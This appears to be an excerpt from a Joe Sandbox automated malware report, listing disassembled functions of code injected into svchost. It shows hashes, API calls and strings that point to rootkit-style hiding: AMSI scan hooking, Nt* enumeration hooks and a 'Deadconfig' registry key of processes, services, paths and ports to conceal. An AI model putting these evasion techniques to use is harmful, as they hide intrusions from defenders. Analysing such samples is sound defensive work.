                                                        • try_get_function.LIBVCRUNTIME ref: 0000026A879CD751
                                                        • TlsSetValue.KERNEL32(?,?,?,0000026A879CB50E,?,?,?,0000026A879CB969,?,?,?,?,0000026A879CBA1D), ref: 0000026A879CD768
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Valuetry_get_function
                                                        • String ID: FlsSetValue
                                                        • API String ID: 738293619-3750699315
                                                        • Opcode ID: fc325339b7f97732f837055afb4aa1383e496b4c3619d26f7748048e5b1acc4f
                                                        • Instruction ID: 7f2d1068c69fd1daaa2840e56ee522c4cf992a8f544c30cc10a58f7712e20314
                                                        • Opcode Fuzzy Hash: fc325339b7f97732f837055afb4aa1383e496b4c3619d26f7748048e5b1acc4f
                                                        • Instruction Fuzzy Hash: E1E092B5604600D1FED48B60F94C2DC7E72BBC8780F588126E909273E4DE3AC856CB02
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                        • Instruction ID: 8802ff9419eae7743a3a0ef74dac876a4928fd54d24e081a1a60cd4df4e39084
                                                        • Opcode Fuzzy Hash: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                        • Instruction Fuzzy Hash: E111A371A40B9181EE55CB66940815DBBB0FBC8FA1F598214DE5D63794FE39C042CB04
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction ID: 2c48dc19e786c3eb72415be0286c5c0383a1706879dfe082f89047f98b56d407
                                                        • Opcode Fuzzy Hash: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction Fuzzy Hash: E5E03231A01A02C6F748CBA2D80C3493FE1EB98B0AF488024890D07760DF7EC4998B81
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction ID: 7c9554ebe337213b1a6bf704eb19815aaf95e40af5af9b43b49e71941156e171
                                                        • Opcode Fuzzy Hash: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction Fuzzy Hash: 25E0E571611A41C6F748DB62D80C25D7FB1FB98B16F888024C90D07B24EE3A84998A11

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32 ref: 00000179537A3631
                                                        • PathFindFileNameW.SHLWAPI ref: 00000179537A3640
                                                          • Part of subcall function 00000179537A3C70: StrCmpNIW.KERNELBASE(?,?,?,00000179537A255A), ref: 00000179537A3C88
                                                          • Part of subcall function 00000179537A3BB8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000179537A3657), ref: 00000179537A3BC6
                                                          • Part of subcall function 00000179537A3BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000179537A3657), ref: 00000179537A3BF4
                                                          • Part of subcall function 00000179537A3BB8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000179537A3657), ref: 00000179537A3C16
                                                          • Part of subcall function 00000179537A3BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000179537A3657), ref: 00000179537A3C34
                                                          • Part of subcall function 00000179537A3BB8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000179537A3657), ref: 00000179537A3C55
                                                        • CreateThread.KERNELBASE ref: 00000179537A3687
                                                          • Part of subcall function 00000179537A1D3C: GetCurrentThread.KERNEL32 ref: 00000179537A1D47
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Dead
                                                        • API String ID: 0-1293411866
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000003.1829522378.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_3_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00000179537A1628: GetProcessHeap.KERNEL32 ref: 00000179537A1633
                                                          • Part of subcall function 00000179537A1628: HeapAlloc.KERNEL32 ref: 00000179537A1642
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A16B2
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A16DF
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A16F9
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1719
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A1734
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1754
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A176F
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A178F
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A17AA
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A17CA
                                                        • SleepEx.KERNELBASE ref: 00000179537A1AE3
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A17E5
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1805
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A1820
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1840
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A185B
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A187B
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A1896
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A18A0
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$Heap$AllocProcessSleep
                                                        • String ID:
                                                        • API String ID: 948135145-0

                                                        Control-flow Graph

                                                        APIs
                                                        • HeapAlloc.KERNEL32(?,?,00000000,00000179537AB521,?,?,?,00000179537AB969,?,?,?,?,00000179537ABA1D), ref: 00000179537AB9D5
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AllocHeap
                                                        • String ID:
                                                        • API String ID: 4292702814-0

                                                        Control-flow Graph

                                                        APIs
                                                        • HeapAlloc.KERNEL32(?,?,FFFFFFFD,00000179537ACB34,?,?,?,?,00000000,?,?,00000179537ACDAA), ref: 00000179537AAF6A
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AllocHeap
                                                        • String ID:
                                                        • API String ID: 4292702814-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000003.1829522378.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_3_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                        • API String ID: 3215553584-1407779936

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\Deadconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 2135414181-3864762265

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 00000179537A1D47
                                                          • Part of subcall function 00000179537A20C0: GetModuleHandleA.KERNEL32(?,?,?,00000179537A1D79), ref: 00000179537A20D8
                                                          • Part of subcall function 00000179537A20C0: GetProcAddress.KERNEL32(?,?,?,00000179537A1D79), ref: 00000179537A20E9
                                                          • Part of subcall function 00000179537A5F50: GetCurrentThreadId.KERNEL32 ref: 00000179537A5F8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                        • API String ID: 4175298099-4225371247
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000003.1829522378.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_3_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: bad array new length
                                                        • API String ID: 190073905-1242854226
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: 117a70c9fd4a5af8f6538bebe1d0b72fa41e995df5b9e41a9d619c1a81635272
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: 5581E631F1C2A186FB53AB2594413E967F1BB4778CF44456BEA0C937AADB78C84E8710

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Running Time
                                                        • API String ID: 1943346504-1805530042
                                                        • Opcode ID: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction ID: 2895b2554e113aa91f9c480ce72561ef6d74b28a13f9fa80c9b3b14ce7caa0f1
                                                        • Opcode Fuzzy Hash: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction Fuzzy Hash: 0831DC31E18A6496F712CF92A4043DAB3B1F789BC9F444117EE8D43B24EF38C4598740

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Utilization Percentage
                                                        • API String ID: 1943346504-3507739905
                                                        • Opcode ID: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction ID: ad2a23686253c9dae7c2068e57bb35f726f592bedf0220ca7a2f324de2bfa574
                                                        • Opcode Fuzzy Hash: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction Fuzzy Hash: 61318131A28F6186F752DFA6E85479A63B1F785F89F044127DE4E43B24EF38C4498600

                                                        Control-flow Graph

                                                        Control-flow graph (legend: Executed / Not Executed) of the function starting at 179537a7930; the rendered graph is not recoverable from the extracted text. Recoverable details: entry block 179537a7930-179537a7936, terminal block 179537a7c3f-179537a7c4c, the __scrt_dllmain_crt_thread_attach label at 179537a7958, a recursive call to 179537a7930, and calls to 179537a7fe0, 179537a7e74, 179537a7f24, 179537a7f9c, 179537a7e3c, 179537a8338, 179537a8150, 179537a8174, 179537a7fcc, 179537a81b0, 179537a3618, 179537a7a98, 179537a7ee4, 179537a82fc, 179537a7e2c, 179537a7e58, 179537a9dfc, 179537a81a0, 179537a80b8 and 179537a9d98.
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: f6d283d8385ea9a87ab5327fad51ca6933fedb54720d286f476f041588e6e2ca
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: 6E810631E2C2B196F6579BA998813D963F2A74778CF444067D90DC7796EF38C94E8700
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(?,?,?,00000179537A9AEF,?,?,?,00000179537A98B4,?,?,?,?,00000179537A94A5), ref: 00000179537A99B5
                                                        • GetLastError.KERNEL32(?,?,?,00000179537A9AEF,?,?,?,00000179537A98B4,?,?,?,?,00000179537A94A5), ref: 00000179537A99C3
                                                        • LoadLibraryExW.KERNEL32(?,?,?,00000179537A9AEF,?,?,?,00000179537A98B4,?,?,?,?,00000179537A94A5), ref: 00000179537A99ED
                                                        • FreeLibrary.KERNEL32(?,?,?,00000179537A9AEF,?,?,?,00000179537A98B4,?,?,?,?,00000179537A94A5), ref: 00000179537A9A33
                                                        • GetProcAddress.KERNEL32(?,?,?,00000179537A9AEF,?,?,?,00000179537A98B4,?,?,?,?,00000179537A94A5), ref: 00000179537A9A3F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction ID: 0f0b4730a1ba7bfcf0baa74fe338853f95d8d3eba7f9443d2628ab5ec01facb2
                                                        • Opcode Fuzzy Hash: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction Fuzzy Hash: DA31A531B2AA64A1FE179B42A8507DD63B8FB47B68F594527DD2D07390EF38C459C300
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction ID: 2437a8b51684a13ae34f0f7689f0f0060c2104b9327bea4e9ef54d5ec47a7f7e
                                                        • Opcode Fuzzy Hash: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction Fuzzy Hash: 4111B231B18B6486F7518B52E86835973B0F78AFE8F000226EA5D87794EF3CC948C740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: Dead
                                                        • API String ID: 756756679-1293411866
                                                        • Opcode ID: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction ID: fb8b43cd758de4931f8e82002fbe7b8cfd4fb9c6bffa49b051a15534a120ed0b
                                                        • Opcode Fuzzy Hash: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction Fuzzy Hash: B731B332F19B6182FB56DFD6A4443A963B0FB56B88F0440229F4C07B94EF38D4A98700
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction ID: f80ac3cf0bbbfd5f16a2fdc16c31ab354769bbfe1f0ce3f257f61dd22aa88529
                                                        • Opcode Fuzzy Hash: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction Fuzzy Hash: 8F016D31B0CA9482FB15DB52A86839963B1FB89BC8F884136DE8E43754EF3CC589C740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmp
